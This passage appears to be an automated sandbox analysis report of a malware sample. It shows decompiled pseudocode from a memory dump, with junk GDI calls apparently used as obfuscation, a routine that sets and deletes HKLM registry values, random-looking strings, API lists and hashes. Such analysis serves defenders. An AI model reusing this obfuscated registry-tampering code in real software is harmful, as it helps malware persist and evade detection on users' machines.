ArcTo.GDI32(00000000,00000010,0000001A,00000039,0000003A,00000054,00000028,00000047,00000034), ref: 00EC242B
CancelDC.GDI32(00000000), ref: 00EC2455

Strings

hfcWMuhsA,,cXX91 zcJNjafcvw8xkMcDvVohYWz2C3l i40r56FRmzhZWcxeGyc5XOWjjZ ztnZC4Thm43ypMt63, QJTMly MoVDDmhl1O 9sgVzUiz8oykEYEH.icnf2z8l9 6BCM.BpSAU14X5CQa7,4 J1iAU1uyk Yx8YhQmkAynSDQn91PJgHDgfFdkBZxPPgUdyWqCBazC9r.TP4 xqfEoyWrlw15OJ.f9jCcLDj8 8Mg,VeMVg2hMeUsiqr, xrefs: 00EC23C9

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: Cancel$CreateFileInfoMeta
String ID: hfcWMuhsA,,cXX91 zcJNjafcvw8xkMcDvVohYWz2C3l i40r56FRmzhZWcxeGyc5XOWjjZ ztnZC4Thm43ypMt63, QJTMly MoVDDmhl1O 9sgVzUiz8oykEYEH.icnf2z8l9 6BCM.BpSAU14X5CQa7,4 J1iAU1uyk Yx8YhQmkAynSDQn91PJgHDgfFdkBZxPPgUdyWqCBazC9r.TP4 xqfEoyWrlw15OJ.f9jCcLDj8 8Mg,VeMVg2hMeUsiqr
API String ID: 2646103876-2575214652
Opcode ID: c4807d220f1614bffc6f7cb1c72a60ab3ba55ea5605c7379f985b85f4960f2ce
Instruction ID: 574c21f5177424555fd3ec8c7ebff3aa00cabe2196ac73942953a0649fea2b89
Opcode Fuzzy Hash: c4807d220f1614bffc6f7cb1c72a60ab3ba55ea5605c7379f985b85f4960f2ce
Instruction Fuzzy Hash: 58517031E0420AEFEB148B94DE46FADB7B0BB14315F20945DE620BA0D1D7BA9646DB00

Uniqueness

Uniqueness Score: -1.00%

Function 00EC16D2, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00EC16D2(void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				char _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				short _v124;
				char _v125;
				char _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				void* _t33;
				signed int _t34;
				void* _t55;
				void* _t59;
				void* _t60;
				void* _t61;

				_t60 = __edi;
				_t59 = __edx;
				_v8 = _v8 & 0x00000000;
				_t34 = E00EC111F(_t33, __ecx, _a4);
				_pop(_t55);
				_v8 = _t34;
				ArcTo(0, 0x23, 0x2a, 5, 3, 0x1b, 0x21, 0x39, 0x2b);
				_t65 = _v8;
				if(_v8 < 0) {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							goto L4;
						}
					}
				} else {
					E00EC2192(_v8);
					_pop(_t55);
				}
				L4:
				E00EC116D(_t55, _t59, _t60, _t65, _a4);
				_v12 = 0x24;
				_v52 = E00ECD177( &_v48, "0 lL1j6lE35 k4Us.z9wEfBc6DliY3Z7VkXzVComx8pmI286oXkhk0L QrtKfvLfV0pTA oGIHv XK9UGT8CSdLXGkgqztPLf0ySDrUaBPPy8QGWUKJ C fLpCKfPAg,fA7.DopXcgjK6ENOI1jFR78HNJxGtKY4txTpTVY1Wd0xcT1H4GeH z45LNy,QUR 5Xr8YN7Q RCGo9W1.qQktpE8 A,cm1 OGcdgmYT2CeJQ8414A4pHToumR13IjnlP,oGLKXyFas17EIowTgG6nvJG8a.jngXi0BphFgUwdH0YXtXEHi0tr9lYKqROrFvwe0EGy4nwwZBNPANVQIehBoTUSeh efNq 79iF9aGX 9vep  RSTW4Gq b.3E1FyD8Zo8XWtuhKVRm51MkypCgm9tMtVrGmhHxy8YePZhfZEQT d.9A6700BKU 1e1BpeaXnIwH3KqavMwpeiazaSTTwGZCauhDrhRmgWI,vcpFc H.AaCRlwoCKyFF g83n7NDlmBE  meTeKMMKX0ZXk1,IH.XFVvbEF7tY5ihHmyy6 zCknkHpDQbq641rZMWoz3RLUrl8Eem,oYkzKMHOoEQbvNagxJeNvZuzh7 8jO9saZkYVMPdcyXtQ0Oyrg41hrx9WmXsVwRq8y. hOAxYxw oT0eUailMy3,JNpK,0XKai7yazK3QzrSqWgYSQmAhPP5DjBPCBoiyLgI6TI9MM8XNRZMU9 EnLuGSOgy7c7uhMGtfvE.9rry sm,qVOB91j WuNaKO L4XpfzLzEsLvEpT3D0mDq0KRczQNpvghbGQAvBWx9ldwXHudAu Qs96FBry8M8wp7Vrw7gqCtI6lpXdR, bsrhS I4HYkV5To2 nL4BS12zKvR1 Qp18fIYrQwa jm4obJfAmwp27 sMn7h r9MiRYRKe naog3bYZTF.EAraZXtIjXjmM8a.nH rHBS4SiESG5XIuUi2tBI2Leq0qdH4dNpBc4Q4VKGnLwkM.R2TYBgeiVFXu7TOwl XnIgpqpYNUiq,PFcCYP V7B9MJ.8As nwUasZD5Nt V 9 SSb75vqaO  h ,ZWBVw5Xc.jTPTX5zcKdAbY29wBmgmA4EWYlHjwF6D0lXf71.p2 8KoqS yfA9 NYNw,kseVIDyniBPjNCNh.BdH3 DEycRtD0CqJk xjCpOqwPN RokaZgyiJJmwo.gycwHBaT2QRJzzgV66dtO.4eW5RTS13suZeGpjCd aUgA6,07qkjAewSSQPSSvksge,6KNBIq5L,J7qt7ex.0b0yxVOoP9aa8WD0ts woqv xYT9boHD Ulghi2v,SwQ8r7vHre Zv j bSWGZl jPbSreAxWZS9oc rYuTzZceubkZOCoNtFnqAREzVB 9KpTlo3EY 6Imsw1OiAvpZ92w5FBs.o1EVT11wpUY,RB1iSnyALaqUkdXqJYt5uxC.ioIU8OYvXF76pSR Gg vK hAiy4qoT4ksRRt97 CibdH4o2mRUhgKgx2n XQR1paxXqDU,1kGRAbz4M 9ikS76FXlzJ48 eaU81ghBcTHtYhoHjtY766b7Qnm7OpoSAGhgDR30x2xy Xw9qs.L9u9a,T,", _v12);
				_v56 = GetLastError();
				_v60 = E00ECFE78("HqAp2N7JpEPTiuWRo.LNxOGi8 ZNFX9BMS9yhk6VlAF0CfWN.uiTtIKs1o9mjDs.kWzA3M8 AWr.1FgDy C2y78,Bre.6rBodpAyYPXgrIH0.4Ug.6yRPWaNcae531Ixvr1vjAdxtZq365my XRBO8BStlPLvy0qeMgyR9dEg7wmxLk51p3oahj.Tt 2a2DECSv8midRpgeyHX Te5oC9 zItu KanaUVjfMQeVRBF84t INO6Z 8p6C0DZu GkzXBFOd,sKk2JZ1uYh3YN7iS6xG paMpZ6RI10qmjDms.UqwPT.MoEgeM54hcsavHEJ1eEBTh5Aw.lfAAs4lDhvVPs, sgFsRPJhY Qn9xd WVNsr4fcl.cVkTBPDPlM.p ,7R W4  quuoMoxDeoY1.05jsU.rMvUsW3udiafOk0paQBwdBt6xrO9SHVCxX2ddyK0Udq31DS1Rd.HRxJw0Rg0sbsQ IIdeSQlO870jQ4TTfI E1k6,PJ4u Iil7SY576K,grmfIe6MQQMF7RmtaC,9onW57cjkqZBH0tw6rY0FoOAaLokVFFKysOrIzZ0SOXLMyzC5vFgW,LmPNR  H0keAFnmlph..wdPq3q ExFEiShkf3XqKVQ7VIZ hQsrmMKrgo3t6XP .mDC8h8n dX v6GXuKK 2B0IMlakxRml5b Wb5W4DX.HNXo9Q YGSzXPCT.OyK.VJeKi qEvh4x2vZJ L,mCO3au tQXK T9kMIr,49aqp4a kSptSQrZIE3tUYkSPnELB 6U8ugwhP9 enQoiVBPScDTUyk oo2ly03XrWcl0L,p yUZHYpg3hKwBoBq97Nebrs");
				if(_v60 <= 0xf) {
					_v148 = _v60;
				} else {
					_v148 = 0xf;
				}
				_v144 = _v148;
				_v125 = 0;
				_v56 = _v56 & 0x00000000;
				while(_v56 < _v144) {
					 *((char*)(_t61 + _v56 - 0x88)) = _v56 + 0x42;
					MultiByteToWideChar(0, 0,  &_v140, 0xffffffff,  &_v124, 0x20);
					_v56 = _v56 + 1;
				}
				__eflags = 0;
				return 0;
			}

0x00ec16d2
0x00ec16d2
0x00ec16db
0x00ec16e2
0x00ec16e7
0x00ec16e8
0x00ec16fd
0x00ec1703
0x00ec1707
0x00ec1714
0x00ec1714
0x00ec1716
0x00000000
0x00000000
0x00ec1718
0x00ec1709
0x00ec170c
0x00ec1711
0x00ec1711
0x00ec171a
0x00ec171d
0x00ec1723
0x00ec173e
0x00ec1747
0x00ec1755
0x00ec175c
0x00ec176d
0x00ec175e
0x00ec175e
0x00ec175e
0x00ec1779
0x00ec177f
0x00ec1783
0x00ec1790
0x00ec17a4
0x00ec17be
0x00ec178d
0x00ec178d
0x00ec17c6
0x00ec17c9

APIs

ArcTo.GDI32(00000000,00000023,0000002A,00000005,00000003,0000001B,00000021,00000039,0000002B), ref: 00EC16FD
GetLastError.KERNEL32 ref: 00EC1741
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00EC17BE

Part of subcall function 00EC2192: CancelDC.GDI32(00000000,00000000,00EF56E8), ref: 00EC2295

Strings

0 lL1j6lE35 k4Us.z9wEfBc6DliY3Z7VkXzVComx8pmI286oXkhk0L QrtKfvLfV0pTA oGIHv XK9UGT8CSdLXGkgqztPLf0ySDrUaBPPy8QGWUKJ C fLpCKfPAg,fA7.DopXcgjK6ENOI1jFR78HNJxGtKY4txTpTVY1Wd0xcT1H4GeH z45LNy,QUR 5Xr8YN7Q RCGo9W1.qQktpE8 A,cm1 OGcdgmYT2CeJQ8414A4pHToumR13IjnlP,oGL, xrefs: 00EC172D
$, xrefs: 00EC1723
HqAp2N7JpEPTiuWRo.LNxOGi8 ZNFX9BMS9yhk6VlAF0CfWN.uiTtIKs1o9mjDs.kWzA3M8 AWr.1FgDy C2y78,Bre.6rBodpAyYPXgrIH0.4Ug.6yRPWaNcae531Ixvr1vjAdxtZq365my XRBO8BStlPLvy0qeMgyR9dEg7wmxLk51p3oahj.Tt 2a2DECSv8midRpgeyHX Te5oC9 zItu KanaUVjfMQeVRBF84t INO6Z 8p6C0DZu GkzXBFO, xrefs: 00EC174A

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: ByteCancelCharErrorLastMultiWide
String ID: $$0 lL1j6lE35 k4Us.z9wEfBc6DliY3Z7VkXzVComx8pmI286oXkhk0L QrtKfvLfV0pTA oGIHv XK9UGT8CSdLXGkgqztPLf0ySDrUaBPPy8QGWUKJ C fLpCKfPAg,fA7.DopXcgjK6ENOI1jFR78HNJxGtKY4txTpTVY1Wd0xcT1H4GeH z45LNy,QUR 5Xr8YN7Q RCGo9W1.qQktpE8 A,cm1 OGcdgmYT2CeJQ8414A4pHToumR13IjnlP,oGL$HqAp2N7JpEPTiuWRo.LNxOGi8 ZNFX9BMS9yhk6VlAF0CfWN.uiTtIKs1o9mjDs.kWzA3M8 AWr.1FgDy C2y78,Bre.6rBodpAyYPXgrIH0.4Ug.6yRPWaNcae531Ixvr1vjAdxtZq365my XRBO8BStlPLvy0qeMgyR9dEg7wmxLk51p3oahj.Tt 2a2DECSv8midRpgeyHX Te5oC9 zItu KanaUVjfMQeVRBF84t INO6Z 8p6C0DZu GkzXBFO
API String ID: 3940802696-1303938719
Opcode ID: 21f631dc9f62bad289fa90a29f39c0682399ea8f2b354cd0f76323c48e7e4aa0
Instruction ID: 047d0181c8f6e9c68549387ea79951b9230c06b270dbedb031430c39cf7d9e54
Opcode Fuzzy Hash: 21f631dc9f62bad289fa90a29f39c0682399ea8f2b354cd0f76323c48e7e4aa0
Instruction Fuzzy Hash: CF315E30945208EFDB10DFA4EE8AF9CBBB5EB05711F20509AF109BA1D2D7B14A859B10

Uniqueness

Uniqueness Score: -1.00%

Function 00ED660A, Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00ED6620
SysAllocString.OLEAUT32(00000000), ref: 00ED6628
SysAllocString.OLEAUT32(00000000), ref: 00ED663C
SysFreeString.OLEAUT32(00000000), ref: 00ED66B6
SysFreeString.OLEAUT32(00EC8A06), ref: 00ED66BB
SysFreeString.OLEAUT32(00ED6FD2), ref: 00ED66C0

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 1670a438451f10e3ee29345a7ebc27bdb3f4c62d5e352f5a81e1c1e69d2b5fc2
Instruction ID: 84d67197f2fab2a95d7f0657a774b61e1e75e63a358967db02a10870a69f7b7e
Opcode Fuzzy Hash: 1670a438451f10e3ee29345a7ebc27bdb3f4c62d5e352f5a81e1c1e69d2b5fc2
Instruction Fuzzy Hash: 1D21FFB1D00219AFCF00DFE5CC888AFBFB9EF48254B1044AAB915AB210D6719E41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00ED05FE, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 206
registryCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00ED05FE(void* __ecx, void* _a4, short* _a8, short* _a12, int _a16, char* _a20, int _a24) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v160;
				void* __edi;
				void* __esi;
				signed int _t74;
				intOrPtr _t76;
				intOrPtr _t81;
				signed int _t82;
				signed int _t83;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t92;
				char _t95;
				signed int _t106;
				void* _t109;
				signed int _t111;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t121;
				int _t122;
				intOrPtr _t127;
				void* _t133;
				intOrPtr _t134;
				intOrPtr _t136;
				void* _t153;
				char* _t157;
				signed int _t158;
				char _t159;
				char* _t161;
				void* _t163;
				void* _t164;
				void* _t166;

				if(_a4 != 0x80000002) {
					L27:
					_t122 = 0;
					L28:
					_t74 = RegOpenKeyExW(_a4, _a8, _t122, 2,  &_v16);
					if(_t74 == 0) {
						if(_a20 == _t122) {
							if(RegDeleteValueW(_v16, _a12) == 0) {
								L37:
								L34:
								_t76 =  *0xef56d4; // 0x520f880
								 *((intOrPtr*)(_t76 + 0x1c))(_v16);
								return 0;
							}
							_push(0xfffffffd);
							L33:
							_pop(0);
							goto L34;
						}
						if(RegSetValueExW(_v16, _a12, _t122, _a16, _a20, _a24) == 0) {
							goto L37;
						}
						_push(0xfffffffe);
						goto L33;
					}
					return _t74 | 0xffffffff;
				}
				_t81 =  *0xef56a8; // 0xf00000
				if( *((short*)(_t81 + 0x9c)) != 9) {
					goto L27;
				}
				_t82 =  *0xef56c8; // 0x520f6c8
				_t122 = 0;
				if( *((intOrPtr*)(_t82 + 0x6c)) == 0) {
					goto L28;
				}
				_t157 = _a20;
				_v32 = 0;
				_v20 = 0;
				if(_t157 == 0) {
					L21:
					_t83 = _v20;
					L22:
					return _t83;
				}
				if( *((intOrPtr*)(_t82 + 0x60)) == 0 ||  *((intOrPtr*)(_t82 + 0x64)) == 0) {
					_t83 = _t82 | 0xffffffff;
					goto L22;
				} else {
					_a4 = E00ED3A82(__ecx, 0xcdc);
					if(_a16 != 4) {
						if(_a16 != 1) {
							_push(0xfffffffc);
							L25:
							_pop(_t158);
							E00ED0299( &_a4);
							_t83 = _t158;
							goto L22;
						}
						_t127 =  *0xef56a8; // 0xf00000
						_t87 = E00ECFF99(_t127 + 0x1020);
						_t18 = _t157 + 0x28; // 0xa1d
						_t88 = E00ECFF99(_t18);
						_t89 = E00ECFF99(_a4);
						_t90 = E00ECFF99(_a8);
						_t92 = _t87 + _t88 + _t89 + _t90 + E00ECFF99(_a12) + 1;
						_v8 = _t92;
						_t150 = _t92;
						L10:
						_t159 = E00ECD239(_t150 + _t150 + 2);
						_pop(_t133);
						_v12 = _t159;
						if(_t159 != _t122) {
							_t95 = E00ED3A82(_t133, 0x750);
							_t134 =  *0xef56a8; // 0xf00000
							_v28 = _t95;
							_t123 = E00ECE17D(_t150, _t159, _t95, _t134 + 0x1020);
							_t164 = _t163 + 0xc;
							if(_t96 <= 0) {
								_v20 = 0xfffffffa;
							} else {
								if(_a16 != 4) {
									_push(_a20);
									_push(_a12);
									_push(L"REG_SZ");
									E00ECE17D(_v8 - _t123, _v12 + _t123 * 2, _a4, _a8);
									_t166 = _t164 + 0x14;
								} else {
									_push( *_a20);
									_t161 =  &_v160;
									_push(L"%u");
									_t153 = 0x40;
									E00ECE17D(_t153, _t161);
									_push(_t161);
									_push(_a12);
									_push(L"REG_DWORD");
									E00ECE17D(_v8 - _t123, _v12 + _t123 * 2, _a4, _a8);
									_t166 = _t164 + 0x1c;
								}
								_t106 =  *0xef56c8; // 0x520f6c8
								 *((intOrPtr*)(_t106 + 0x60))( &_v24);
								_t109 = E00ECDD64(_v12,  &_v32, 0x1388, 1);
								_t164 = _t166 + 0x10;
								if(_t109 == 0) {
									_v20 = 0xfffffff9;
								}
								_t111 =  *0xef56c8; // 0x520f6c8
								 *((intOrPtr*)(_t111 + 0x64))( &_v24);
							}
							E00ECD1EA( &_v12, 0xfffffffe);
							E00ED0299( &_v28);
							E00ED0299( &_a4);
							goto L21;
						}
						_push(0xfffffffb);
						goto L25;
					}
					_t136 =  *0xef56a8; // 0xf00000
					_t118 = E00ECFF99(_t136 + 0x1020);
					_t119 = E00ECFF99(_a4);
					_t120 = E00ECFF99(_a8);
					_t121 = E00ECFF99(_a12);
					_t150 = _t118 + _t119 + _t120 + _t121 + 0x29;
					_v8 = _t118 + _t119 + _t120 + _t121 + 0x29;
					goto L10;
				}
			}

0x00ed0610
0x00ed0825
0x00ed0825
0x00ed0827
0x00ed0834
0x00ed083c
0x00ed0846
0x00ed0882
0x00ed0888
0x00ed0865
0x00ed0868
0x00ed086d
0x00000000
0x00ed0870
0x00ed0884
0x00ed0864
0x00ed0864
0x00000000
0x00ed0864
0x00ed0860
0x00000000
0x00000000
0x00ed0862
0x00000000
0x00ed0862
0x00000000
0x00ed083e
0x00ed0616
0x00ed0623
0x00000000
0x00000000
0x00ed0629
0x00ed062e
0x00ed0633
0x00000000
0x00000000
0x00ed0639
0x00ed063d
0x00ed0640
0x00ed0645
0x00ed0807
0x00ed0807
0x00ed080a
0x00000000
0x00ed080a
0x00ed064e
0x00ed0820
0x00000000
0x00ed065d
0x00ed066c
0x00ed066f
0x00ed06ad
0x00ed080f
0x00ed0811
0x00ed0814
0x00ed0816
0x00ed081c
0x00000000
0x00ed081c
0x00ed06b3
0x00ed06bf
0x00ed06c4
0x00ed06c9
0x00ed06d3
0x00ed06dd
0x00ed06ec
0x00ed06f0
0x00ed06f3
0x00ed06f5
0x00ed06ff
0x00ed0701
0x00ed0702
0x00ed0707
0x00ed0715
0x00ed071a
0x00ed0728
0x00ed0730
0x00ed0732
0x00ed0737
0x00ed07e0
0x00ed073d
0x00ed0741
0x00ed0781
0x00ed0787
0x00ed078d
0x00ed079d
0x00ed07a2
0x00ed0743
0x00ed0746
0x00ed0748
0x00ed074e
0x00ed0755
0x00ed0756
0x00ed0760
0x00ed0761
0x00ed0767
0x00ed0777
0x00ed077c
0x00ed077c
0x00ed07a9
0x00ed07ae
0x00ed07bf
0x00ed07c4
0x00ed07c9
0x00ed07cb
0x00ed07cb
0x00ed07d6
0x00ed07db
0x00ed07db
0x00ed07ed
0x00ed07f6
0x00ed07ff
0x00000000
0x00ed0804
0x00ed0709
0x00000000
0x00ed0709
0x00ed0671
0x00ed067d
0x00ed0687
0x00ed0691
0x00ed069b
0x00ed06a0
0x00ed06a4
0x00000000
0x00ed06a4

APIs

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000002,?,00EC9A80,00000004), ref: 00ED0834
RegSetValueExW.ADVAPI32(?,?,00000000,?,000009F5,00000004), ref: 00ED0858
RegDeleteValueW.ADVAPI32(?,?), ref: 00ED087A

Part of subcall function 00ECE17D: _vsnwprintf.MSVCRT ref: 00ECE192

Strings

REG_SZ, xrefs: 00ED078D
REG_DWORD, xrefs: 00ED0767

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: Value$DeleteOpen_vsnwprintf
String ID: REG_DWORD$REG_SZ
API String ID: 3817759962-1027521805
Opcode ID: 42e7159111716643e3cd5eb195258644f1f63c9be5efc8ba4e033ce8445be698
Instruction ID: 108d232fc3b03fd2f01cf18bda8476d955583df145e494222eeeda85d1032329
Opcode Fuzzy Hash: 42e7159111716643e3cd5eb195258644f1f63c9be5efc8ba4e033ce8445be698
Instruction Fuzzy Hash: 8F71B076A00209EFCF10EFA4DC45EAD7BA6EF04324F15552AF910BB2A1D731DA56DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00EC135A, Relevance: 7.8, APIs: 5, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00EC135A(void* __edi, intOrPtr _a4, intOrPtr _a8, signed int _a16) {
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* __ebx;
				void* __esi;
				intOrPtr _t119;
				signed int _t134;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				signed int _t147;
				signed int _t150;
				signed int _t152;
				signed int _t156;
				intOrPtr _t158;
				signed int _t159;
				signed int _t162;
				intOrPtr _t166;
				intOrPtr _t168;
				intOrPtr _t170;
				intOrPtr _t172;
				intOrPtr _t174;
				intOrPtr _t176;
				signed int _t180;
				void* _t187;
				intOrPtr _t191;
				intOrPtr _t192;
				intOrPtr _t193;
				intOrPtr _t194;
				void* _t208;
				void* _t211;

				_t208 = __edi;
				_v32 = _v32 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v40 = _v40 & 0x00000000;
				while(0 != 0) {
				}
				_v24 = E00ED00D0(_a8,  &_v40);
				__eflags = _v24;
				if(_v24 != 0) {
					_v48 = _v48 & 0x00000000;
					_v52 = _v52 & 0x00000000;
					_v44 = _v44 & 0x00000000;
					_v56 = _v56 & 0x00000000;
					_v48 = E00ECD84B( &_v52);
					__eflags = _v48;
					if(_v48 != 0) {
						_v44 = _v44 & 0x00000000;
						while(1) {
							__eflags = _v44 - _v52;
							if(_v44 >= _v52) {
								break;
							}
							_t150 = E00ECDE0D( *((intOrPtr*)(_v48 + _v44 * 4)),  &_v20);
							__eflags = _t150;
							if(_t150 != 0) {
								goto L12;
							} else {
								 *0xef5694 = _v40;
								 *0xef5688 = _a4;
								 *0xef568c = _a16;
								_t156 = E00ECDA7D(_v20, _v24, _v40);
								_t211 = _t211 + 0xc;
								 *0xef5690 = _t156;
								IsValidCodePage(0x41);
								__eflags =  *0xef5690;
								if(__eflags != 0) {
									_t158 =  *0xef56a8; // 0xf00000
									_t159 = E00ECD976(_t208,  &_v20, __eflags, E00EC1CA2,  *((intOrPtr*)(_t158 + 0x224)));
									__eflags = _t159;
									if(_t159 != 0) {
										ArcTo(0, 0x2e, 0, 0x2e, 0x59, 0xf, 0x4a, 4, 0x29);
										_t162 = E00ECD24F( &_v20);
										__eflags = _t162;
										if(_t162 != 0) {
											_v28 = E00EC22A1(_v20);
											BitBlt(0, 0x52, 0xb, 0x4f, 0x2c, 0, 0x49, 0x21, 0x48);
											_v56 = 1;
										} else {
											while(1) {
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											_t166 =  *0xef56c8; // 0x520f6c8
											 *((intOrPtr*)(_t166 + 0x30))(_v16);
											_t168 =  *0xef56c8; // 0x520f6c8
											 *((intOrPtr*)(_t168 + 0x30))(_v20);
											_v36 = 0xfffffffc;
											goto L12;
										}
									} else {
										_t170 =  *0xef56c8; // 0x520f6c8
										 *((intOrPtr*)(_t170 + 0x30))(_v16);
										_t172 =  *0xef56c8; // 0x520f6c8
										 *((intOrPtr*)(_t172 + 0x30))(_v20);
										_v36 = 0xfffffffd;
										goto L12;
									}
								} else {
									_t174 =  *0xef56c8; // 0x520f6c8
									 *((intOrPtr*)(_t174 + 0x30))(_v16);
									_t176 =  *0xef56c8; // 0x520f6c8
									 *((intOrPtr*)(_t176 + 0x30))(_v20);
									_v36 = 0xfffffffe;
									L12:
									_t152 = _v44 + 1;
									__eflags = _t152;
									_v44 = _t152;
									continue;
								}
							}
							break;
						}
						_v44 = _v44 & 0x00000000;
						while(1) {
							__eflags = _v44 - _v52;
							if(_v44 >= _v52) {
								break;
							}
							E00ECD1EA(_v48 + _v44 * 4, 0xfffffffe);
							_t147 = _v44 + 1;
							__eflags = _t147;
							_v44 = _t147;
						}
						E00ECD1EA( &_v48, _v52 << 2);
						_pop(_t187);
						__eflags = _v56;
						if(_v56 != 0) {
							ArcTo(0, 0x5c, 0xb, 0x51, 2, 0x31, 8, 0x3d, 0x4f);
							_t118 = _a16 & 0x00000001;
							__eflags = _a16 & 0x00000001;
							if((_a16 & 0x00000001) != 0) {
								L41:
								_t119 =  *0xef56c8; // 0x520f6c8
								 *((intOrPtr*)(_t119 + 0x30))(_v16);
								while(1) {
									__eflags = 0;
									if(0 == 0) {
										goto L44;
									}
								}
							} else {
								_v32 = E00EC111F(_t118, _t187, _a4);
								Arc(0, 0x19, 0x32, 0x12, 0x3a, 0x15, 0x5f, 0x40, 0x18);
								__eflags = _v32;
								if(_v32 >= 0) {
									L40:
									_t191 =  *0xef5684; // 0x0
									 *((intOrPtr*)(_t191 + (_v32 << 4))) = _a4;
									_t192 =  *0xef5684; // 0x0
									 *((intOrPtr*)(_t192 + (_v32 << 4) + 4)) = 1;
									_t193 =  *0xef5684; // 0x0
									 *(_t193 + (_v32 << 4) + 0xc) = _v28;
									_t134 = _v32 << 4;
									__eflags = _t134;
									_t194 =  *0xef5684; // 0x0
									 *((intOrPtr*)(_t194 + _t134 + 8)) = _v20;
									goto L41;
								} else {
									_t180 =  *0xef5680; // 0x0
									_t135 =  *0xef5680; // 0x0
									_t137 = E00ECD07F(_t180 + 1 << 4, 0xef5684, _t135 << 4);
									__eflags = _t137;
									if(_t137 != 0) {
										_t138 =  *0xef5680; // 0x0
										_v32 = _t138;
										_t139 =  *0xef5680; // 0x0
										_t140 = _t139 + 1;
										__eflags = _t140;
										 *0xef5680 = _t140;
										goto L40;
									} else {
										while(1) {
											__eflags = 0;
											if(0 == 0) {
												break;
											}
										}
									}
								}
							}
						} else {
							while(1) {
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							_v36 = 0xfffffffb;
						}
					} else {
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_v36 = _v36 | 0xffffffff;
					}
				} else {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_v36 = 0xfffffffe;
				}
				L44:
				E00ECD1EA( &_v24, _v40);
				return _v36;
			}

0x00ec135a
0x00ec1362
0x00ec1366
0x00ec136a
0x00ec136e
0x00ec1372
0x00ec1376
0x00ec137a
0x00ec138a
0x00ec138d
0x00ec1391
0x00ec13aa
0x00ec13ae
0x00ec13b2
0x00ec13b6
0x00ec13c4
0x00ec13c7
0x00ec13cb
0x00ec13e1
0x00ec13ee
0x00ec13f1
0x00ec13f4
0x00000000
0x00000000
0x00ec1407
0x00ec140e
0x00ec1410
0x00000000
0x00ec1416
0x00ec1419
0x00ec1421
0x00ec1429
0x00ec1437
0x00ec143c
0x00ec143f
0x00ec1446
0x00ec144c
0x00ec1453
0x00ec1477
0x00ec148a
0x00ec1491
0x00ec1493
0x00ec14c9
0x00ec14d2
0x00ec14d7
0x00ec14d9
0x00ec150c
0x00ec1521
0x00ec1527
0x00ec14db
0x00ec14db
0x00ec14db
0x00ec14dd
0x00000000
0x00000000
0x00ec14df
0x00ec14e4
0x00ec14e9
0x00ec14ef
0x00ec14f4
0x00ec14f7
0x00000000
0x00ec14f7
0x00ec1495
0x00ec1498
0x00ec149d
0x00ec14a3
0x00ec14a8
0x00ec14ab
0x00000000
0x00ec14ab
0x00ec1455
0x00ec1458
0x00ec145d
0x00ec1463
0x00ec1468
0x00ec146b
0x00ec13e7
0x00ec13ea
0x00ec13ea
0x00ec13eb
0x00000000
0x00ec13eb
0x00ec1453
0x00000000
0x00ec1410
0x00ec1535
0x00ec1542
0x00ec1545
0x00ec1548
0x00000000
0x00000000
0x00ec1556
0x00ec153e
0x00ec153e
0x00ec153f
0x00ec153f
0x00ec156a
0x00ec1570
0x00ec1571
0x00ec1575
0x00ec15a0
0x00ec15a9
0x00ec15a9
0x00ec15ac
0x00ec1667
0x00ec166a
0x00ec166f
0x00ec1672
0x00ec1672
0x00ec1674
0x00000000
0x00000000
0x00ec1676
0x00ec15b2
0x00ec15bb
0x00ec15d0
0x00ec15d6
0x00ec15da
0x00ec161b
0x00ec1621
0x00ec162a
0x00ec1633
0x00ec1639
0x00ec1647
0x00ec1650
0x00ec1657
0x00ec1657
0x00ec165a
0x00ec1663
0x00000000
0x00ec15dc
0x00ec15dc
0x00ec15e6
0x00ec15f4
0x00ec15fa
0x00ec15fc
0x00ec1608
0x00ec160d
0x00ec1610
0x00ec1615
0x00ec1615
0x00ec1616
0x00000000
0x00ec15fe
0x00ec15fe
0x00ec15fe
0x00ec1600
0x00000000
0x00000000
0x00ec1602
0x00ec1604
0x00ec15fc
0x00ec15da
0x00ec1577
0x00ec1577
0x00ec1577
0x00ec1579
0x00000000
0x00000000
0x00ec157b
0x00ec157d
0x00ec157d
0x00ec13cd
0x00ec13cd
0x00ec13cd
